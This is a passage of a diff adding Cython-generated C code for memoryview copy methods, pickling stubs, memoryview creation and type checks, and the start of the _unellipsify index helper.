__Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_mslice; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy", 0); + + /* "View.MemoryView":638 + * def copy(self): + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &mslice) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_F_CONTIGUOUS)); + + /* "View.MemoryView":640 + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + * + * slice_copy(self, &mslice) # <<<<<<<<<<<<<< + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_mslice)); + + /* "View.MemoryView":641 + * + * slice_copy(self, &mslice) + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_C_CONTIGUOUS, + */ + __pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_mslice), ((char *)"c"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_C_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 641, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":646 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &mslice) # <<<<<<<<<<<<<< + * + * def copy_fortran(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_mslice)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 646, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy_fortran (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy_fortran", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy_fortran", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy_fortran", 0); + + /* "View.MemoryView":650 + * def copy_fortran(self): + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &src) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_C_CONTIGUOUS)); + + /* "View.MemoryView":652 + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + * + * slice_copy(self, &src) # <<<<<<<<<<<<<< + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_src)); + + /* "View.MemoryView":653 + * + * slice_copy(self, &src) + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_F_CONTIGUOUS, + */ + __pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_src), ((char *)"fortran"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_F_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 653, __pyx_L1_error) + __pyx_v_dst = __pyx_t_1; + + /* "View.MemoryView":658 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &dst) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_dst)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 658, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy_fortran", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryview___reduce_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryview_2__setstate_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + +static PyObject *__pyx_memoryview_new(PyObject *__pyx_v_o, int __pyx_v_flags, int __pyx_v_dtype_is_object, __Pyx_TypeInfo *__pyx_v_typeinfo) { + struct __pyx_memoryview_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_cwrapper", 0); + + /* "View.MemoryView":663 + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) # <<<<<<<<<<<<<< + * result.typeinfo = typeinfo + * return result + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_o); + __Pyx_GIVEREF(__pyx_v_o); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_o); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":664 + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_v_result->typeinfo = __pyx_v_typeinfo; + + /* "View.MemoryView":665 + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_check') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *__pyx_v_o) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("memoryview_check", 0); + + /* "View.MemoryView":669 + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: + * return isinstance(o, memoryview) # <<<<<<<<<<<<<< + * + * cdef tuple _unellipsify(object index, int ndim): + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_o, __pyx_memoryview_type); + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + +static PyObject *_unellipsify(PyObject *__pyx_v_index, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_idx; + PyObject *__pyx_v_tup = NULL; + PyObject *__pyx_v_result = NULL; + int __pyx_v_have_slices; + int __pyx_v_seen_ellipsis; + PyObject *__pyx_v_item = NULL; + Py_ssize_t __pyx_v_nslices; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_UCS4 __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_unellipsify", 0); + + /* "View.MemoryView":677 + * """ + * cdef Py_ssize_t idx + * tup = index if isinstance(index, tuple) else (index,) # <<<<<<<<<<<<<< + * + * result = [slice(None)] * ndim + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_index); + if (__pyx_t_2) { + __Pyx_INCREF(((PyObject*)__pyx_v_index)); + __pyx_t_1 = __pyx_v_index; + } else { + __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 677, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_index); + __Pyx_GIVEREF(__pyx_v_index); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_index); + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + } + __pyx_v_tup = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_t_1 = PyList_New(1 * ((__pyx_v_ndim<0) ? 0:__pyx_v_ndim)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + { Py_ssize_t __pyx_temp; + for (__pyx_temp=0; __pyx_temp < __pyx_v_ndim; __pyx_temp++) { + __Pyx_INCREF(__pyx_slice__5); + __Pyx_GIVEREF(__pyx_slice__5); + PyList_SET_ITEM(__pyx_t_1, __pyx_temp, __pyx_slice__5); + } + } + __pyx_v_result = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":680 + * + * result = [slice(None)] * ndim + * have_slices = False # <<<<<<<<<<<<<< + * seen_ellipsis = False + * idx = 0 + */ + __pyx_v_have_slices = 0; + + /* "View.MemoryView":681 + * result = [slice(None)] * ndim + * have_slices = False + * seen_ellipsis = False # <<<<<<<<<<<<<< + * idx = 0 + * for item in tup: + */ + __pyx_v_seen_ellipsis = 0; + + /* "View.MemoryView":682 + * have_slices = False + * seen_ellipsis = False + * idx = 0 # <<<<<<<<<<<<<< + * for item in tup: + * if item is Ellipsis: + */ + __pyx_v_idx = 0; + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); + __PYX_ERR(1, 683, __pyx_L1_error) + } + __pyx_t_1 = __pyx_v_tup; __Pyx_INCREF(__pyx_t_1); __pyx_t_4 = 0; + for (;;) { + if (__pyx_t_4 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_4); __Pyx_INCREF(__pyx_t_3); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(1, 683, __pyx_L1_error) + #else + __pyx_t_3 = PySequence_ITEM(__pyx_t_1, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 683, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + __pyx_t_2 = (__pyx_v_item == __pyx_builtin_Ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + __pyx_t_2 = (!__pyx_v_seen_ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":686 + * if item is Ellipsis: + * if not seen_ellipsis: + * idx += ndim - len(tup) # <<<<<<<<<<<<<< + * seen_ellipsis = True + * have_slices = True + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 686, __pyx_L1_error) + } + __pyx_t_5 = PyTuple_GET_SIZE(__pyx_v_tup); if (unlikely(__pyx_t_5 == ((Py_ssize_t)-1))) __PYX_ERR(1, 686, __pyx_L1_error) + __pyx_v_idx = (__pyx_v_idx + (__pyx_v_ndim - __pyx_t_5)); + + /* "View.MemoryView":687 + * if not seen_ellipsis: + * idx += ndim - len(tup) + * seen_ellipsis = True # <<<<<<<<<<<<<< + * have_slices = True + * else: + */ + __pyx_v_seen_ellipsis = 1; + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + } + + /* "View.MemoryView":688 + * idx += ndim - len(tup) + * seen_ellipsis = True + * have_slices = True # <<<<<<<<<<<<<< + * else: + * if isinstance(item, slice): + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + /*else*/ { + __pyx_t_2 = PySlice_Check(__pyx_v_item); + if (__pyx_t_2) { + + /* "View.MemoryView":691 + * else: + * if isinstance(item, slice): + * have_slices = True # <<<<<<<<<<<<<< + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + goto __pyx_L7; + } + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + __pyx_t_2 = (!(PyIndex_Check(__pyx_v_item) != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":693 + * have_slices = True + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" # <<<<<<<<<<<<<< + * result[idx] = item + * idx += 1 + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 693, __pyx_L1_error) + 